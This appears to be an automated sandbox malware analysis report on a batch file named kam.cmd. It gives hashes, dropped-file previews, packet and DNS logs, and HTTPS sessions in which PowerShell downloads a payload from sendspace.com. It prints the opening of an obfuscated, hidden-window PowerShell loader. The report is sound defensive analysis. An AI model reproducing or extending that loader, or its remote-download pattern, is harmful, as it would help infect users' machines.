                                                                              SSDEEP:6144:zSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:+vloTMW+EZMM6DFyn03w
                                                                              MD5:F451B9B7369576477928A88519907AAD
                                                                              SHA1:77E1BAE1BD95626B063C441CCE946325D184F3EC
                                                                              SHA-256:F60E00430E9F88BC18F7B740ED4ADDE555379147DB00602FE9BB13E1EAE96FF9
                                                                              SHA-512:C36454EB1E969E50041676032B229F70D6623F384559F3817D3883ED8EB6965BCBC8C872E3615CC9442DA6C5DBBE9267EFAB29EC1F2B340A2C10FA51E61F70C8
                                                                              Malicious:false
                                                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.:..<................................................................................................................................................................................................................................................................................................................................................m..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Windows\svchost.com

                                                                              Download File
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):41472
                                                                              Entropy (8bit):4.812812916305451
                                                                              Encrypted:false
                                                                              SSDEEP:384:sPpOlINgIP79gB3pzhTkR6ETphjuuVnSk8YXiGHgrHL6Zh9oWIkUinksTyCOeM:sEl9bbSVh7VWYOzL49oWPksTyIM
                                                                              MD5:E11C7C303771F18E1542B2C742879D3F
                                                                              SHA1:C37CBCA2FD214FB68A62BACAC27D54C660DF91ED
                                                                              SHA-256:4770F9E9EF9F85A0E5DED7D6EC4BF56EEF45C831EF623C3DCE84EFFBA40ADDAC
                                                                              SHA-512:D9A274D422793A73E8E8BC4745882C7AF0CE34341A62385DA2C026BAB58AAAF6E49044CEF8FFEF68EF24FDD95DEBCD16FA4E79598D29885D6E4A9707B6884A8E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:ASCII text, with very long lines (6364), with no line terminators
                                                                              Entropy (8bit):5.268526468361687
                                                                              TrID:
                                                                                File name:kam.cmd
                                                                                File size:6'364 bytes
                                                                                MD5:c7b720a0f6bffebe027826a2508c52dc
                                                                                SHA1:41b21cdcd0afd9363d1c79202d687c65fc6128b4
                                                                                SHA256:c67dbe7d1bfb36fcab8391ea0728382445c106fb08ad19f9a3fb3777cdef5562
                                                                                SHA512:4e519b29716116807d312aa87453f57eca6893dc84fb4a761ac569c240b5ef617854f6f14a1bcac00ebf9e142ecb0d9d437d48a3542f5cae5bf6d09e5050c199
                                                                                SSDEEP:96:549QmKe2Eb8DxZzthv2iDf8r0dMxmr8BhG+ZmrJ2iCzs:5Le2BYPSE5dlzs
                                                                                TLSH:D5D15DCD0F05355E429A82D8A925D78E0D06D7DDECE893D2DB7CA62C201EEB42A1DC66
                                                                                File Content Preview:start /min powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Int

                                                                                File Icon

                                                                                Icon Hash:9686878b929a9886

                                                                                Network Behavior

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                May 23, 2024 20:12:41.269011974 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.269064903 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:41.269155979 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.278933048 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.278945923 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:41.777451992 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:41.777731895 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.781081915 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.781091928 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:41.781287909 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:41.790971041 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:41.838542938 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:42.072879076 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:42.072928905 CEST44349704104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:12:42.072981119 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:42.076308012 CEST49704443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:12:42.172293901 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.172321081 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:42.172386885 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.172696114 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.172704935 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:42.852545977 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:42.852642059 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.858967066 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.858973980 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:42.859189034 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:42.863171101 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:42.906531096 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.098148108 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.098166943 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.098238945 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.098247051 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.098284006 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.098311901 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.098342896 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.130240917 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.130259991 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.130341053 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.130346060 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.130388021 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.188857079 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.188873053 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.188955069 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.188961029 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.189004898 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.212388992 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.212402105 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.212486029 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.212488890 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.212523937 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.226284981 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.226300001 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.226361036 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.226365089 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.226404905 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.242418051 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.242430925 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.242495060 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.242496967 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.242542982 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.280093908 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.280117989 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.280196905 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.280205965 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.280246973 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.292391062 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.292407990 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.292465925 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.292469978 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.292509079 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.300681114 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.300693989 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.300756931 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.300760031 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.300797939 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.309473038 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.309489965 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.309549093 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.309552908 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.309590101 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.316450119 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.316462040 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.316521883 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.316524982 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.316561937 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.322920084 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.322932959 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.322990894 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.322993994 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.323031902 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.369021893 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.369045019 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.369127989 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.369137049 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.369177103 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.375022888 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.375037909 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.375094891 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.375102043 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.375140905 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.380589962 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.380605936 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.380659103 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.380665064 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.380703926 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.386878014 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.386894941 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.386946917 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.386955023 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.386991024 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.390017033 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.390031099 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.390084028 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.390089989 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.390127897 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.394856930 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.394871950 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.394923925 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.394927979 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.394963026 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.398411036 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.398427010 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.398494005 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.398497105 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.398534060 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.432159901 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.432173967 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.432270050 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.432274103 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.432317019 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.457859039 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.457895041 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.457976103 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.457990885 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.458034992 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.461679935 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.461707115 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.461781025 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.461786032 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.461827993 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.465089083 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.465111017 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.465167999 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.465173006 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.465213060 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.468111038 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.468131065 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.468170881 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.468175888 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.468202114 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.468220949 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.471121073 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.471143961 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.471200943 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.471205950 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.471246958 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.473886967 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.473907948 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.473952055 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.473957062 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.473979950 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.473995924 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.476593018 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.476613045 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.476664066 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.476669073 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.476706982 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.521541119 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.521562099 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.521667004 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.521671057 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.521714926 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.525654078 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.525722027 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.525727987 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.525759935 CEST4434970569.31.136.17192.168.2.5
                                                                                May 23, 2024 20:12:43.525772095 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.525804043 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:12:43.526077986 CEST49705443192.168.2.569.31.136.17
                                                                                May 23, 2024 20:13:15.796199083 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:15.796295881 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:15.796387911 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:15.804913044 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:15.804949045 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.290924072 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.291017056 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.343144894 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.343193054 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.343386889 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.343441010 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.345823050 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.390487909 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.747569084 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.747621059 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.747889042 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.766366959 CEST49713443192.168.2.5104.21.28.80
                                                                                May 23, 2024 20:13:16.766402960 CEST44349713104.21.28.80192.168.2.5
                                                                                May 23, 2024 20:13:16.808975935 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:16.809017897 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:16.809154987 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:16.809953928 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:16.809982061 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:17.496309042 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:17.496417046 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:17.499886990 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:17.499917984 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:17.500144005 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:17.500207901 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:17.512250900 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:17.558496952 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180078030 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180109024 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180124044 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180196047 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.180196047 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.180272102 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180347919 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212168932 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212202072 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212281942 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212281942 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212321997 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212430000 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.271936893 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.271959066 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.272100925 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.272169113 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.272241116 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.301114082 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301136017 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301373005 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.301438093 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301512957 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.316589117 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316605091 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316680908 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.316695929 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316751003 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.332607985 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.332680941 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.332684994 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.332739115 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333316088 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333353996 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.333379984 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333414078 CEST49714443192.168.2.569.31.136.57

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                May 23, 2024 20:12:41.252665043 CEST6204753192.168.2.51.1.1.1
                                                                                May 23, 2024 20:12:41.264358997 CEST53620471.1.1.1192.168.2.5
                                                                                May 23, 2024 20:12:42.077711105 CEST5088853192.168.2.51.1.1.1
                                                                                May 23, 2024 20:12:42.171715021 CEST53508881.1.1.1192.168.2.5
                                                                                May 23, 2024 20:13:16.778476954 CEST5506053192.168.2.51.1.1.1
                                                                                May 23, 2024 20:13:16.807218075 CEST53550601.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                May 23, 2024 20:12:41.252665043 CEST192.168.2.51.1.1.10xeccbStandard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                May 23, 2024 20:12:42.077711105 CEST192.168.2.51.1.1.10xa3b0Standard query (0)fs03n4.sendspace.comA (IP address)IN (0x0001)false
                                                                                May 23, 2024 20:13:16.778476954 CEST192.168.2.51.1.1.10xcd0dStandard query (0)fs13n1.sendspace.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                May 23, 2024 20:12:41.264358997 CEST1.1.1.1192.168.2.50xeccbNo error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                May 23, 2024 20:12:41.264358997 CEST1.1.1.1192.168.2.50xeccbNo error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                May 23, 2024 20:12:42.171715021 CEST1.1.1.1192.168.2.50xa3b0No error (0)fs03n4.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                May 23, 2024 20:13:16.807218075 CEST1.1.1.1192.168.2.50xcd0dNo error (0)fs13n1.sendspace.com69.31.136.57A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.sendspace.com
                                                                                • fs03n4.sendspace.com
                                                                                • fs13n1.sendspace.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549704104.21.28.804431716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-05-23 18:12:41 UTC174OUTGET /pro/dl/i41a76 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: www.sendspace.com
                                                                                Connection: Keep-Alive
                                                                                2024-05-23 18:12:42 UTC946INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 23 May 2024 18:12:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: SID=ros36t9d28mng0p8summt2q6r1; path=/; domain=.sendspace.com
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Pragma: no-cache
                                                                                Location: https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
                                                                                Vary: Accept-Encoding
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wc1S25QabLwOC8tWcMSuw4EEnMJo%2BtIIyQtPrSM%2BEfyR5q2rPZRL%2FxtJyX0CWTD5qC3OhdQ4eNqO88FOYqpQgw75e2GMHI07olaoL3BL%2BsCdm178oE8jU4z4gmbAgZ3OQmz%2FvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 888704021fed3314-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-05-23 18:12:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.54970569.31.136.174431716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-05-23 18:12:42 UTC235OUTGET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
